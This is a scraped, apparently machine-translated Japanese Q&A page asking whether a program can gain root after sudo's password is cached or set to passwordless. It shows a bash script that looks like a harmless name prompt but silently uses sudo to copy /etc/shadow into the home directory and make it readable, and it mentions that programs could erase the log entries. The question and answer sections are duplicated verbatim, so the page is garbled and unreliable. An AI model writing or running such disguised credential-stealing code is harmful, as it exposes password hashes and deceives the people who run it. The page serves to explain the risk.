プログラムがパスワードを取得した後にrootアクセス権を取得できますか？

Question

sudoアカウントがパスワードなしで機能するように設定されている場合、プログラムが実行中であることを示す情報はほとんど表示されませんsudo。

例えば

#!/bin/bash
read -p "Please enter your name: " n
echo "Thank you"

sudo cp -p /etc/shadow "$HOME/.shadow"    # Copy the encrypted list of passwords
sudo chown "$USER" "$HOME/.shadow"        # And make it readable for me

~/.shadow実際にこのスクリプトを実行すると、削除したい場合がほぼ確実になることに注意してください。

ログファイルにエントリがありますが（ディレクトリ内のファイルを参照/var/log）、「スマート」プログラムはこれらのエントリを削除しようとする可能性があります。少なくともローカルで書かれています。

Answer 1

sudoアカウントがパスワードなしで機能するように設定されている場合、プログラムが実行中であることを示す情報はほとんど表示されませんsudo。

例えば

#!/bin/bash
read -p "Please enter your name: " n
echo "Thank you"

sudo cp -p /etc/shadow "$HOME/.shadow"    # Copy the encrypted list of passwords
sudo chown "$USER" "$HOME/.shadow"        # And make it readable for me

~/.shadow実際にこのスクリプトを実行すると、削除したい場合がほぼ確実になることに注意してください。

ログファイルにエントリがありますが（ディレクトリ内のファイルを参照/var/log）、「スマート」プログラムはこれらのエントリを削除しようとする可能性があります。少なくともローカルで書かれています。

プログラムがパスワードを取得した後にrootアクセス権を取得できますか？

ベストアンサー1

おすすめ記事